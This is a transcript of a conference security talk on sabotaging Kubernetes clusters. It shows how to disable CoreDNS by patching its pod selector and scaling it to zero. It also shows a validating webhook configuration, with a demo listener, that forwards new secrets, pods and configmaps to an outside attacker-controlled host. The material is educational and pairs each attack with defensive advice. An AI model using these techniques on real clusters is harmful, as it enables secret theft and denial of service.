
Alrighty. Good afternoon and welcome to the BSides Las Vegas Common Ground track. This talk is From Interview Questions to Cluster Damage: Adventures in Kubernetes Cluster Shenanigans, by Amit Serper and Travis Low. A few announcements before we begin. We'd like to thank our sponsors, uh, especially Adobe and Aikido, and then also Formal and Dropzone AI. It's their support, along with our other sponsors, donors and volunteers, that makes this event possible. These talks are being streamed live, and as a courtesy to our speakers and audience, we ask that you check to make sure that your cell phones are set to silent. If you have a question, use that microphone just in the middle so YouTube can hear you. It's on and ready to go.
As a reminder, the BSides LV photo policy prohibits taking pictures without the explicit permission of everyone in frame. These talks are being recorded and will be available on YouTube in the future. Uh, feel free to move to the front, um, so we can accommodate any more audience members. Uh, with that, let's get started. Please welcome Amit and Travis. >> I think that's yours. >> All right. You have no idea how much appreciation I have for all nine of you, 10 that came uh to our talk. So, thank you so much for being here and for taking time to hear us rant. Uh, all right, let's begin. So, welcome to our talk, From Interview Questions to Cluster
Damage: Adventures in Kubernetes Cluster Shenanigans. Next slide. Let's go. So, why are we here? You know, when we're talking about what the internet is like today, I always like to go back to the old adage that the internet is a series of tubes. I think it was said by a congressperson, uh, which explains a lot. Um, but in today's world, when we're all doing cloud and magic and running things on other people's computers, when you come to think of it, everything eventually has Kubernetes behind it. So the internet is actually a series of Kubes. Uh, there we go. Or, uh, the way that I like to put it, as a person who, and you'll soon learn about it, does not come from a background of Kubernetes: Kubernetes is a series of YAML-induced headaches, and we're going to talk about that too. So, um, so the origin of this talk is, turns out, one day we were just sitting there talking about, um, interviews that were upcoming and some questions that we wanted to ask the potential candidates, and it went from "that's a good question" to "what would happen if," and that's how we ended up with this talk: it was just a bunch of "what would happen if." Um, so if you came to this talk looking for, like, the coolest exploits or zero
days or anything along those lines, you're in the wrong room, because we're just going to be talking about what-if scenarios within a cluster. So there's nothing exploity here. >> Yeah. So for the obligatory who-am-I: so, I'm Amit. I'm the guy with the weird name. Uh, so, uh, I work at CrowdStrike. I do security research, uh, focused mainly on, uh, where Linux and cloud meet together, which is usually very shady places. Uh, I've been doing this thing for nearly, or over rather, 20 years now, which says a lot about, uh, my sad state of affairs. [laughter] Um, and I'm actually not coming from the world of cloud computing
and Kubernetes and all of that. I'm a low-level Linux guy, and I'm proud to say that Travis made me respect, uh, Kubernetes. Uh, these are my socials if you're interested, and, uh, yeah. >> So I, uh, also do research. Uh, I've been in cyber security for about 15 years, but I came at it from the other angle. So when he's all the low-level Linux, that's not really my thing. Uh, I am much more at the higher, cloudy level. It's more fun. It's more fun. Uh, but I also made this guy like YAML. >> Lies. >> It's true. It's true. Um, go for it. >> Yeah. So, I actually saw this meme not long ago, and I thought it's really
appropriate for, uh, for this talk because, you know, I definitely, uh, need therapy, but, uh, this is my house. Like, this is in my home. Uh, this is my Kubernetes cluster. This is my big giant-ass server in the basement that has two power supply units and is the sole reason for my very high electric bill. It's also a 15-year-old server I got off of eBay, so it's very, very inefficient. Um, yeah. So, you know, that's me. >> Oh. Oh. Oh, skipping forward. Uh, I've embraced mini PCs, so I don't have the huge power bill. Um, but I too also run a Kubernetes cluster at home, because why wouldn't you? >> And we're doing great, by the way. Thank
you for asking. [laughter] >> Okay, so let's get a little more serious, as much as we can. So why are we here? >> So Kubernetes is this overengineered beast, uh, that has nothing to do with running at people's homes and running, like, four containers. It's completely stupid, but, you know, we did it anyways. Uh, but Kubernetes, as I said, is very complex. It has tons of components. Uh, it has the API server and the scheduler and the controller manager and, like, all of these things that are always making sure that all of the workloads on your cluster run. So it's constantly looking at what's going on on your
Kubernetes cluster. If, uh, a container crashes for some reason or a pod goes down, it will immediately self-heal and it'll fix itself. But because it's so complicated, security can also be a pain in the ass, uh, when we're talking about Kubernetes, because you have RBAC configs, and you have, like, service accounts that you have to make sure are configured correctly, and network policies, and secrets management — which, uh, there's a cool demo over there — and, like, so many things that are happening all the time in your cluster, and it only means that there are so many things that can go wrong if you have, like, a wrong configuration or someone is doing naughty things inside your cluster. So, we're going to talk a lot about that, but in order to, like, have, uh, a common ground — hardy har — uh, I'll let Travis, uh, introduce you to some basic terms in Kubernetes. >> Yeah. So, before we begin, I have a question for all of you. Um, at all of my talks where I talk about Kubernetes, I always do a primer first just to make sure everyone's level set. Quick show of hands: who knows what a replica set is? Okay, it's getting more people, so we'll have to stop doing this soon. Um, but so we're going to go through a quick primer. Um, for you Star
Trek fans, this is not a Death Star, which I've been told this kind of looks like. This is actually just paint primer. Um, so here we go. Um, so a quick overview. Um, so Amit mentioned, you know, there's the control plane. There's just all of these different components that are core components to it, um, that help with all the automated things to make sure everything is at the state that you want. Um, there's a lot that comes into it. Uh, so when you first install Kubernetes, there are, like, 66, I think, default primitives that exist within a cluster, and then you get to add more as you expand your capabilities. Um, we're not going to talk about all of
them. What we care about today is just a few things. Um, so let's kind of break this down, uh, from the outside in. So on the upper right we have an internet request that comes into a load balancer, and then it talks to a service within Kubernetes. That service is just an object that helps route traffic to the pods that exist. The whole thing that it does is make sure that traffic goes to the right pods, because pods come and go. Um, and a pod is, like, the lowest level of compute that Kubernetes manages. Uh, anything below that is a container, which the container runtime handles, and containers get associated with pods, uh, via the kubelet and a few
other things. A pod can exist inside a deployment, which is basically an organizational structure that says I want two pods, three pods, four pods, and Kubernetes will go through and make sure that you've always got that state. Uh, if you just have a single pod running and it goes down, it's not going to come back. And that's what a deployment helps do: make sure that it's being managed so that it comes back up again. All of these things exist within a namespace. You can think of a namespace as just, like, a big organizational unit that exists on the cluster. It doesn't actually exist anywhere in the cluster physically outside of where it gets stored into a database. It's just more
of an abstracted, um, organizational unit. A pod can actually have more than one container as well. Typically, you'll see a 1:1 ratio with a pod and a container, but depending on what's running on the underlying cluster, you may have, like, a networking sidecar for, like, Istio or something like that that's helping proxy traffic around the cluster. You may have security monitoring tools. You may have a logging capability. There's all kinds of different reasons why you might have more than one container in a pod. And that's just because they share, uh, similar Linux namespaces as they spin up. Uh, you know, back to that low-level Linux that I don't like. Um, from the container runtime perspective,
you'll have this orchestrator, this agent that exists on the node. And you can think of a node as an EC2 instance or a virtual machine or a physical server. That's all a node is. And it joins the cluster, um, with the help of the kubelet, which is just a binary. It's like the agent for Kubernetes that runs on the cluster. And its whole thing, outside of making sure that the node is up and healthy and reporting home the way it's supposed to, is it talks to the container runtime to ensure that the containers that are supposed to be running on the node are actually running. I mentioned earlier that a namespace is kind of this weird abstraction for, um,
just an organizational unit and this is what it looks like when you start scaling up a cluster to two nodes. So you'll have a namespace that kind of exists ephemerally across all of them. Same thing with a deployment. It's more of just a definition of how you want state to be. And then here in this case, we have two pods on one node uh and one on the top node because we've defined that we want three replicas at any given time. So if one of them goes down, it'll spin up another one. It may or may not be on the same node. If the node goes down, Kubernetes will reschedule it and move it where it needs to go.
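A minimal sketch of what that looks like in YAML — the names and the nginx image here are hypothetical, not from the talk's demo cluster:

```
kubectl apply -f - <<'EOF'
# Hypothetical example: a Deployment that keeps three replicas alive,
# plus a Service that routes traffic to whichever of those pods currently exist.
apiVersion: apps/v1
kind: Deployment
metadata:
  name: web
spec:
  replicas: 3                 # Kubernetes reconciles toward this count; kill a pod and it comes back
  selector:
    matchLabels:
      app: web
  template:
    metadata:
      labels:
        app: web
    spec:
      containers:
        - name: nginx
          image: nginx:1.27
---
apiVersion: v1
kind: Service
metadata:
  name: web
spec:
  selector:
    app: web                  # the Service finds pods by label, not by IP
  ports:
    - port: 80
      targetPort: 80
EOF
```

Delete one of the three pods and the Deployment's controller notices the count dropped below spec and schedules a replacement — exactly the self-healing behavior described above.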
Switching gears a bit, let's talk about service accounts and just kind of more of, like, an RBAC point of view. Um, in Kubernetes, a service account is a who, a role is a what, and then you need a role binding that says these two go together. So, if you're familiar with AWS, the role is basically like an IAM policy. Uh, and then the service account is just an entity, basically. Uh, but without all three of these working together, the service account is going to exist, but it's not going to be able to do anything. So, when it needs to talk to the Kubernetes API, it's going to get access denied. Another primitive in Kubernetes is a
secret. It's, uh, in my opinion, a poorly named object in Kubernetes, because it's not really a secret. Uh, probably most of you noticed that the username and password there look very familiar, and they are base64 encoded, and that's it. >> Encrypted. >> I'm sorry. Yes, you're right. Encrypted. Encrypted. Um, so anyone who has access to the namespace and can read the secrets, or anyone who can just read secrets across the entire cluster, has access to these secrets. So a lot of times in mature organizations you'll see vaulting get used — so, like, HashiCorp Vault or something like that instead of secrets — but in smaller organizations, secrets, unfortunately they're misnamed, but they get used a lot for storing
really sensitive information. Uh, and so here, you know, we've got admin decoded and then whatever I picked for the password down there. Um, as we talk about this YAML and break it down a little bit, um, we'll notice on line five, the kind is Secret. So that determines what the object is. So when you have a kind of Pod, your YAML is going to be defining a pod, so on and so forth for all of those 66 primitives, uh, plus whatever you add. Uh, the metadata, where it says name: my-secret-2, is actually the name of the object. It's the friendly name that is going to appear when you're talking to the API
server. Uh, and then on line nine we have namespace: dev, which is commented out, but this secret would actually get deployed into that namespace. Um, and so that's kind of like the typical schema that you'll see, at a real high level, within a Kubernetes cluster for all the YAML. Yeah. >> What is the type? >> Um, so there are different types of secrets, and it just affects the behavior of it, basically. Uh, and so this is a config map. So a config map is something that you would see — um, let's use the example of an nginx or an Apache web server, because that's what everyone runs when it comes to Kubernetes: web servers. Uh, a
config map would basically have your web config. Um, so if you, um, consider what goes into config files typically — uh, in this case we've got a game demo — the likelihood of having a secret in here, or something very sensitive, is pretty high as well. And again, this is just plain text. Uh, so anyone who has access and can read these config maps can see those things. Uh, that namespace organizational unit can be thought of as a really soft security boundary. And you'll see a lot of Kubernetes admins say team A has access to these four namespaces and team B has access to these other namespaces, and that's how they prevent people from cross-contaminating.
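As a concrete illustration of how thin that "secret" really is, a sketch — the object name echoes the slide, but the values are made up:

```
# A Secret is just base64, not encryption:
kubectl apply -f - <<'EOF'
apiVersion: v1
kind: Secret
metadata:
  name: my-secret-2
type: Opaque
data:
  username: YWRtaW4=      # "admin"
  password: aHVudGVyMg==  # "hunter2" -- hypothetical value, not the one from the demo
EOF

# Anyone allowed to read secrets in the namespace gets the plaintext back in one line:
kubectl get secret my-secret-2 -o jsonpath='{.data.password}' | base64 -d
```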
But it is just relying on Kubernetes RBAC. There is no other control that goes into place there. So, you're basically one layer away from oops. All right, your turn. >> Yeah. So, I forgot to mention, um, we're going to ask questions. We very much would like you to participate. There are very lucrative prizes right here. We worked very hard to source them. >> It was two separate Amazon orders. One arrived to my house, one arrived to Travis's house. >> Transport them. >> We had to transport them here. >> Yeah. >> And Yeah. So please participate when we ask questions, or else you won't get it, which is a shame, because we'll have to carry it back. [laughter]
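Before the breaking starts, here's the who/what/binding trio from the primer written out as a sketch — all names are hypothetical, the namespace is assumed to be default, and the Role is deliberately narrow:

```
kubectl apply -f - <<'EOF'
# The "who": an identity for workloads to run as
apiVersion: v1
kind: ServiceAccount
metadata:
  name: app-reader
---
# The "what": permissions, roughly analogous to an IAM policy
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: pod-reader
rules:
  - apiGroups: [""]
    resources: ["pods"]
    verbs: ["get", "list", "watch"]
---
# The glue: without this binding, the service account just gets "access denied"
apiVersion: rbac.authorization.k8s.io/v1
kind: RoleBinding
metadata:
  name: app-reader-can-read-pods
subjects:
  - kind: ServiceAccount
    name: app-reader
    namespace: default
roleRef:
  kind: Role
  name: pod-reader
  apiGroup: rbac.authorization.k8s.io
EOF
```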
>> Okay. So let's talk about Kubernetes security and visibility for a second, because it's kind of a big deal and it's also kind of, like, complex. So as I said in the beginning, I'm a low-level guy. Uh, I'm, like, an IDA guy. Let me reverse engineer things. Binary patching, vulnerability research — that's my jam. And I wasn't really feeling the whole Kubernetes thing until I had this, like, sort of Eureka moment. I was like, oh wait, what if I think of Kubernetes as a distributed operating system? Because, like, low-level operating system research is kind of my jam. So what if I, like, just do this sort of a head
fake and look at Kubernetes as a distributed operating system? And at least for me, the moment I started to think of and view Kubernetes like that, things started making, uh, more sense, for me at least. So, as I said, Kubernetes has, like, tons of different objects and primitives, and all of these things work together. Even if you take Travis's example of, like, a cluster role and a cluster role binding and all of these — it's, like, three different things that have to connect together. So all of the visibility into these things can be sort of cumbersome and difficult. Uh, there's also the
runtime side and the control plane side, which are supposedly connected, but they're not really, because when you are running a pod, this pod is running a container on an operating system on a Linux machine, and it has all of the Linux machine stuff that comes with it. So you need to have visibility into what's happening on the runtime side — on, like, what the Linux machine is actually doing — which is more of, like, an EDR way of looking at things. But there's also everything that happens on the control plane: all of these objects that we've mentioned before that are interacting together, you know, millions of times per minute sometimes, depending on how big your cluster is. So think about how can you
create visibility for something — even if you're a security product, how can you tie these two things together? And this is often, uh, not an easy task. Um, clusters can hold many secrets, and as Travis mentioned, secrets are not really secret unless you're, uh, working on making them secret, which adds even more complexity to things, and, you know, there's a really cool demo, uh, that we're going to show you about that. Also, think about the fact that clusters, they run a lot of workloads. They're connected to a lot of places, especially if you're, like, fully in the cloud and, like, things are connected to your VPCs and to your
network. Sometimes even, like, um, a workload like, uh — I don't know if you know WordPress, have you heard about it? — uh, sometimes it gets vulnerabilities, and I mean, think if there's, like, a vulnerability in WordPress or some other workload that you're running, um, and this pod happens to be connected to a whole bunch of other resources, um, in your network — and again, it could be, like, a network in the cloud, like a VPC, or, like, your organization — it can add, like, even more issues, and it can actually, like, pave the way for an attacker into your organization just by exploiting, like, a shitty WordPress site. So, all of these
things, we need to keep them in mind when we're talking about, um, visibility and monitoring. Um, another thing that I kind of like about attacking clusters is that old attacks are new again. So, all of the stuff like massively scanning ports on a network — like, yeah, let's scan, like, a /16 — it's relevant again within a huge Kubernetes cluster, because there is a lot of, like, subnet networking that happens inside a cluster. Um, so suddenly old tools that we almost, like, forgot about, or, like, things that are, like, you know, just a gigantic nmap scan — it's like, yeah, okay, let's do that — or masscan, it's relevant again. Um, and as
I said in the beginning, like, security products, a lot of them will tell you that they have good visibility. They'll tell you we have complete visibility into your Kubernetes deployment. Many times they don't. Many times they will show you what they can. Uh, there are many different ways of collecting that data from a cluster. Uh, it's not always trivial to tie everything together. Again, as I said, you have the control plane, you have the data plane or the runtime side of things. Tying these things together is kind of complicated. So once we have all of this information, um, in mind, let's begin with why we're actually here. So as Travis said,
we're interviewing a lot at CrowdStrike. We're interviewing a lot of people, and there's a part of our interview that we do where we just ask, like, sort of free-form questions. So okay, we ask you, like, all of the knowledge questions that you should know or not, but then we're like, "Okay, let's play a game." Um, how would you, like, completely [ __ ] up a cluster? Like, you have a working cluster and you want to do something really bad to it — how would you do that? And, like, again, there are no wrong answers. I mean, there are, but, like, we mostly want to see, like, um, how you think. So this is the part
where you can win a trophy and a medal. Uh, so we would appreciate, uh, participation. Um, so let's say that you're an evil hacker and you have cluster access and sufficient privileges to the cluster. How would you keep the cluster from running and recovering broken or new pods? Now, why are we asking this question? Because if we are, like, role-playing in this game where you're an attacker — um, when you want to see what's happening as a defender in Kubernetes, you might, as an admin, want to, uh, either exec into pods. So if you're not familiar, think of it as, like, SSHing into a Linux container, but
you're not really SSHing into it. But basically, you're getting a shell on your, uh, on your container. So as an admin, you'd like to, like, exec into the pod and see what's running, or you would like to spin up a new pod or a new container with some security tools on it. And we, as the evil attacker, we want to keep these things from happening. So what would you do? So I would like to welcome you to a game of reverse DevOps Jenga. So it's basically, like, what parts can we remove to get everything to fall down? Because in Jenga it's the opposite, you know. Um, so I'd also like to, uh, talk to you a little bit
uh, about DNS and Kubernetes, because it's a complicated hate story. So, uh, Kubernetes has a thing that's called CoreDNS, and CoreDNS is everything that's in charge of DNS inside the cluster. Now, the thing about a Kubernetes cluster, which is kind of a cool feature, is that when you're inside the cluster, you can do everything with DNS. You don't need to know the IP address of, um, a container or a pod. You can just address it by DNS. And also the kubelet, the component that, like, talks to the, uh, API server, also uses that. So everything uses DNS in Kubernetes. So it's sort of like a single
point of failure. So, uh, let's talk about a DNS resolution flow real quick. So a pod makes a DNS query — so, for example, you have, uh, my-service. The query goes to the CoreDNS pod. What CoreDNS is, is just another, uh, container that runs in a different namespace, the kube-system namespace, where all of the important Kubernetes stuff is. And it's just a pod that does DNS things. Uh, you would send a query, CoreDNS checks its internal records, and returns an IP address — like, you know, like DNS. And all of that is happening in the context of an already running pod.
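Concretely, that flow is easy to poke at from a throwaway pod — my-service and my-namespace below are hypothetical placeholders:

```
# Spin up a throwaway pod and resolve a Service purely by name;
# the query goes to the CoreDNS pods in kube-system, not to any outside resolver.
kubectl run dns-test --rm -it --restart=Never --image=busybox:1.36 -- \
  nslookup my-service.my-namespace.svc.cluster.local
```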
So what happens if we take down DNS? So let's do it. The immediate impact, if we cause DNS inside a cluster to fail, would obviously be that new DNS queries from pods will fail. So if you have, um, a workload that needs to resolve some host name, be it inside the cluster or outside the cluster, well, it's not going to work. Um, obviously, existing connections will remain unaffected, but eventually DNS resolution timeouts will occur, and new requests are going to fail, or they're going to take a lot of time until they time out, which is also, uh, kind of annoying. Um, the default DNS query timeout in Kubernetes is, uh, about 5 seconds. So if things fail, things
freeze for five seconds, which is a lot of time, and then it's, like, sort of a cascade of failures that come after that. Excuse me. Um, pods will eventually retry DNS queries based on their configuration — and configuration varies, obviously — but eventually you'll start getting errors and things will stop working. Uh, obviously, you know, some applications have some sort of, like, a DNS caching mechanism, but eventually things are going to fail. Like, that's how it is. It's annoying, but it's not a complete disaster. So for the first question: what if the admin wants to start, uh, a pod with a new container? So DNS is down right now, and an admin wants to
start a pod with a new container. Who wants a trophy and a medal? Don't embarrass me. Yes.
There's a— You mind using the mic? >> If we're embarrassing you, might as well, like, do it with a microphone. >> Right here. Does it work, though? >> I think so. >> Okay, good. >> So, first of all, the container— like, it needs to pull the container from somewhere. So, it would address some service that will pull the container. >> Okay. Okay. And if it doesn't have— I don't know if it just knows what that service is or if it needs DNS to do that >> already. It needs DNS, and CoreDNS is down. >> So what will happen is it will just fail and be in a loop until it starts.
>> Well, it's not the right answer, but you get a tr— you participated, so it counts. Yeah. >> Like a half medal. >> This is yours. >> Another contender. Yeah, but I mean, sort of cheating, right? You want to use, like, a kubectl command to, like, spin up a new pod. So, like, any guess — will it work? Will it fail?
>> That's cheating again. You get a trophy though. >> Okay, we're going to start running out of them. So [laughter] yeah, here's four. Definitely. >> Okay. Oh, wow. Look at Wow. Everybody wants a trophy. Yeah. Uh you first. Sorry.
>> Uh, do you mind using the mic? I just can't hear you. And whoever is going to be miserable enough to watch that video afterwards won't be able to hear you. >> Yeah. So, uh, if the admin wants to start a new container, no new code. >> Closer to the mic. >> Sorry. >> Yes. [laughter] Is it going to be in a— It was more like a question. Is it going to be in, like, an inconsistent state where it can't obtain an IP address? >> Mm-mm. >> No. >> Sorry. Give this guy a trophy. >> Okay, last one and we'll move on. >> I think you could be able to, uh, create the pod but not the container
because you don't have the new address for the container to actually, uh, be built. >> I think close, but no cigar. Okay, we'll continue. So the thing is that, um, it's actually going to work. And the reason why it's actually going to work is that when you're pulling a new container, whoever is doing the DNS resolution is the kubelet that sits on the node. So it's using the DNS that's configured in, like, I don't know, /etc/resolv.conf on that node. So it's not going through CoreDNS. So, it's actually going to work — which is like, but wait a minute, I just took down CoreDNS. Like, why will it still work, right? It will
work. You'll be able to, uh, pull a container. So, the kubelet, as Travis mentioned, um, is just this binary, this agent, this Kubernetes agent that sits on the node and configures it and manages, um, manages, like, DNS resolutions for inside and outside. Um, it handles a whole bunch of things. It injects, uh, the cluster DNS settings. It does a whole bunch of things where it manages the cluster and everything about it. But, um, when you are doing DNS resolution on behalf of the kubelet — when you're pulling a container, um — it will resolve through whatever DNS is configured on the host. Um, but let's go back to breaking
stuff. So let's continue talking about, uh, like, a cluster denial of service. Let's break DNS. So, again, in the setting of an interview, um, this is, like, a cool answer we'd like to see. So a thing that's important to remember about DNS — about Kubernetes, sorry — is that it always tries to self-correct. So if something falls, it will make sure that — you know, a pod crashes, it will reschedule it and rerun it. If some service or deployment dies, it will again try to rerun it, because that gigantic list of objects that you saw earlier, they're all tied to each other. The API server, uh, and all the core components are always trying to make sure that whatever
it is that you defined in that horrible YAML — and YAML is terrible, as, like, a broad statement — um, whatever you defined in your YAML should always work no matter what fails. So we're basically trying to force things to fail. So what in that case we'd like to do is we'd like to patch the CoreDNS, uh, DaemonSet in Kubernetes to basically say: I am only going to provide DNS services for, uh, nodes that have a certain label on them. So a label is like a tag. You can tag things or label things. And you can actually, um, run a command like that one here. I don't know if you can see my — I don't know if you can see my pointer? No, you can't, because it's the other screen. Computers are hard. So, if you run this command, what it's going to do, it's basically going to patch the CoreDNS DaemonSet and tell it: hey, if a node in your cluster doesn't have this label — in this example, I just call it, like, non-existent — so if that label isn't attached to a node, no DNS for you. So, again, this is a feature of Kubernetes. We're not exploiting anything. There's not a vulnerability. It's just something that you can do. Um, so in that case, you won't have, uh, DNS on your cluster. So at that point, we were like, yeah, that's how it works. That's how Kubernetes works. Sure, we're security researchers. We've been doing this for a while. We know what we're doing. And then, um, we wanted to, like, model it in a lab environment so that we'll have a video and screenshots for this presentation. And then we realized that we're wrong and we don't know what we're talking about, because even when we, uh, patched the DaemonSet, DNS kept working, and if before I had three CoreDNS, uh, pods running — I thought I killed all of them. I thought they're not going to work. I always had one pod that was there and was still working, and I still had DNS even though I patched the DaemonSet. So why would you listen to me? Right. Um, so then we're like, okay, that is not enough — patching that label in is not enough. We actually need to do that, and we also need to edit the, uh, replica set of, uh, CoreDNS and make sure, right here where that gigantic arrow is, that we're scaling it down to zero. So now, even though things are supposed to work and spin back up, they're not going to spin back up again. It's a feature. There's no black magic here.
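Put together, the two steps described above look roughly like this. The sketch assumes CoreDNS runs as the stock coredns Deployment in kube-system (the kubeadm default); adjust the object type and name to whatever your distribution ships:

```
# Step 1: pin CoreDNS pods to a label that no node has, so anything rescheduled can never land anywhere.
kubectl -n kube-system patch deployment coredns --type merge \
  -p '{"spec":{"template":{"spec":{"nodeSelector":{"non-existent":"true"}}}}}'

# Step 2: the already-running replicas keep answering until they die, so scale them away too.
kubectl -n kube-system scale deployment coredns --replicas=0
```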
But imagine doing that. Sorry — I'll just finish this sentence and continue. Imagine that you're a Kubernetes administrator or a security guy, and you have to figure out why things are not working, and again, it's a million different objects. It's a million different things. Where — what do you look at? Where do you begin? Maybe it's, like, something with the node that's wrong, that it's not resolving things? Maybe it's something else. So, this is why visibility into your Kubernetes cluster is super important, because if someone wants to make you experience, like, a really bad day, or, like, wants to cause you to have a bad time, it's fairly easy and straightforward, and it's, like, almost part of the, uh, part of the thing. So, once we knock DNS down, a lot of other things are going to fail as well. So, uh, kube-proxy, which is the component that's in charge of managing all of the proxied connections in and out of your, uh, pods — that's going to fail as well, because there's no DNS. It can't resolve the IP addresses to the, um, pods that it needs to service. So now you have another thing that's falling down because a previous thing is falling down. So it's like Jenga when you're bad at it. So in this screenshot you can see
that I, as, like, an admin, am trying to run a pod with the busybox image, because I want to get a shell, right, and I just want to spin up this pod and do something, but things are not working. I'm getting, like, weird warnings. Um, like, there's no DNS. I can't connect to anything. This host name — kubernetes.default.svc.cluster.local — is actually the host name of the API server from within the cluster. So even that is not resolving. So, like, you're going to have a really bad time trying to trace back what originated it and why things are not working. Unless you have really good visibility, you're just going to
have a bad time. So how do you prevent it? So, just like everything with Kubernetes: proper RBAC hygiene. So, make sure that only, uh, people that need to be a cluster admin, or need the ability to affect things in the kube-system namespace, have that. Um, make sure you have some mutating, uh, webhooks that monitor critical components — and Travis will go into that as well. And obviously good monitoring — and, like, just writing "good monitoring" here and just telling you to have it, it's like, you know, hey, it's your problem, it's not mine, right? But it's really, really important that even if you go shopping
for a security product, you need to make sure that it's really monitoring all the right things, not whatever the vendor is trying to tell you that they're monitoring. You have to make sure that this is happening. You know, again, we work for a security vendor, and we're working on making sure that we have good monitoring. Um, okay, Travis Low. >> Thank you. Thank you. Uh, okay. So, this is a question for everyone here. Um, whoever gets to the mic first — well, I'm only going to do one, because we are ticking away at time here. If you wanted to exfil data from a cluster, how would you do it? You can get two trophies. It's okay.
>> I'll try, um, HTTP proxy, I guess. Yeah, that's one way. Trophy. >> Trophy. Another medal, too. >> Absolutely. Yeah, absolutely. No, no, I'm not. >> Yeah. [laughter] Um, so one of the things that we discussed during our setup was, uh, using webhooks. So, uh, Amit just mentioned mutating webhooks. Um, let's talk about what a webhook is and then how you can use them for kind of, like, a persistent data exfil. Uh, during the admission process, when you submit your YAML to a Kubernetes API server, uh, it goes through authentication, authorization, then it goes through any mutating admission. So, it looks at that kind. And so in the case of, like, a
secret, it looks for the kind of Secret or a kind of Pod, or whatever it is that it wants to mutate and change, and it will apply a change to your YAML for you automatically behind the scenes, and you won't know it. This is really helpful in, like, Istio — so, like, a service mesh or something like that — or security tools. With admission control, the admins can basically say, hey, always apply a security tool to every new pod that comes into a cluster. That way your developers don't have to mess with it. They don't have to try to integrate with it. It just magically happens for them on the back end. It's really handy. It's really helpful
for an attacker. It's a really easy way to exfil data. Um, what slide was I on? Moving on. Okay. So, in our scenario here, we have a malicious webhook that's going to exfil data. So, at point one, you have your developer who makes a request to the Kubernetes control plane there in the center. Uh, we've got a rule, a validating webhook, at the bottom that says, hey, validate all new secrets. Uh, then step three, we configure the validating webhook to kick all of that traffic to our helpful, handy listening web server that the attacker controls. Four, the response comes back from the web server, and then it goes through the rest of the admissions process, where
it goes to step five. Was it allowed? Was it not allowed? If it was, it gets written into the persistent data store, etcd, which is like the Kubernetes persistence — it's like the source of truth for Kubernetes. If it's denied, it goes the false path. Either way, it goes back to the user to let them know, hey, your workload was admitted, or no, it wasn't. This is what a validating webhook looks like. Uh, the only lines that we really care about today are the ones that are big and green. Uh, so we've got the URL of admission.jellyparks.com. So we have a listening web server at this external location, and then any new resource that gets — any new pod, config
map, or secret that gets created on the cluster — uh, the line right above where it says resources is operations: create and update. So anytime a new workload gets admitted, anytime a new secret gets created, or anytime a new config map gets created, it's going to send the whole definition file to admission.jellyparks.com. That way it can be validated, and then the response will come back: is it allowed, is it not allowed? So as an attacker, if you have sufficient privileges, you could create this webhook and let it sit there. Maybe people will know, maybe they won't. Uh, so let's go to a demo. Let's try a computer here. There's the mouse.
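For reference, the definition being demoed has roughly this shape — the URL is the one from the slide, while the caBundle, failurePolicy, and other plumbing are filled in with assumed values:

```
kubectl apply -f - <<'EOF'
apiVersion: admissionregistration.k8s.io/v1
kind: ValidatingWebhookConfiguration
metadata:
  name: sneaky-validator
webhooks:
  - name: validate.admission.jellyparks.com
    clientConfig:
      url: https://admission.jellyparks.com/validate   # attacker-controlled listener
      # caBundle: <cert for the listener, omitted here>
    rules:
      - apiGroups: [""]
        apiVersions: ["v1"]
        operations: ["CREATE", "UPDATE"]
        resources: ["pods", "secrets", "configmaps"]
    admissionReviewVersions: ["v1"]
    sideEffects: None
    failurePolicy: Ignore    # fail open, so the cluster keeps working and nobody notices
EOF
```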
>> Hooray. >> Hooray. Oh, this is going to be fun. >> Space. Just hit space. >> Yeah. Yeah. No, I'm just going to have to highlight and talk at the same time. Is it going? It's not going. We got it. We got it. Go team. Okay. So, right here we have our admission web server. Um, basically we've got, um, a /validate route where we're listening for POST requests. And then we've got the UID, which is like the key for the request that we need to be able to return to Kubernetes. We're going to just print some things, um, if it's a secret, because that's what we care about right now. We're just going to print it to the
terminal, because this is just a demo. And then we're going to return, hey, it was allowed — a 200 with a UID. That's all we're going to do. So here we've got, um, our Python server that we start. So now we're listening. Uh, on the next tab here, we've got, um, a very similar definition to what we just talked about, um, where we go to admission.jellyparks.com/validate. Uh, and then we've got the operation that we care about, which is create, as well as what resources we're monitoring for. This has already been applied to the cluster. Um, so here in a second we are going to delete a secret and then create one. So we're going to delete and create
maybe. There we go. So it says it's been created. And then if we go back to our web server, we'll see that we've got the secret printed out, as well as the data. So anytime a new object gets created in the cluster, it's just going to go. Um, so it's a real sneaky-ish way to exfil data from a cluster. Um, bring the mouse back. Man, the computers. So, how do you stop this? >> The thing is still visible. >> Oh, the thing is still visible. Thank you. Questions? >> I wanted to ask, will this also — like, is a secret created in the same way also when you, uh, create a pod with a service account?
>> Yeah, absolutely. So in this case the webhook was looking for new pods. So any new pod definition that gets submitted — anything in that manifest would be exported out to our listening web server. >> Yeah, but the manifest doesn't have the secret, but the >> correct service account token. Yeah, >> the service account token. No, that wouldn't be there, because that gets mounted as a volume in the running pod once it spins up. Yeah. So, that wouldn't be there. Okay. >> But isn't it easier to just, like, run, uh, tcpdump or something — like, packet capture on all — like, you know, start a pod with a capability to — >> You could, uh, if you had, you know, access
to the underlying node. Uh, you could — you'll run into a lot of certificate problems. So you'd have to export all of those certificates so you could, you know, unpack all the traffic and everything. >> Mhm. >> So >> you're also inside one specific node. >> Yeah. >> Right. You want to look at everything that happens all over the cluster. >> Yeah. So this would be cluster-wide. So for tcpdump, yeah, you'd have to be in every single node. >> Yeah. >> So there's a — you could do it. Absolutely. It's another way. Yeah. >> Um, so prevention around the webhook: healthy RBAC is the key thing here. Um, do your webhooks change in your
environment frequently? I'm guessing they don't. In most environments, they don't. So, you could have a noisy detection to monitor any change to those and then just ping your Kubernetes admin to say, "Hey, did you make this change?" It's really easy, and it gives you that extra layer beyond just relying on RBAC. Uh, and yes, cyclists do have to stop at stop signs. They're just like cars. >> Okay, >> I would skip this. >> Yeah, we're going to skip this one. Um, how would you enumerate a cluster? The anticipated answer is someone was going to say they were going to use masscan or nmap or something along those lines, or use kubectl to
interact with the API to say show me all of the things. That is true. It's a way you could do it. Um, but you can actually do it with as little as one API request. Kubernetes has a huge ecosystem, and Kubernetes admins, monitoring teams, networking teams, they install a lot of helpful applications so that they can monitor the health of the cluster. By default, a lot of them aren't necessarily the most secure. And so we're going to pick on one here called Kubecost, which is responsible for monitoring costs of workloads and, um, you know, tying it to a cost center, basically. Uh, all right. So we've got our Python application here. It's just, um, going to
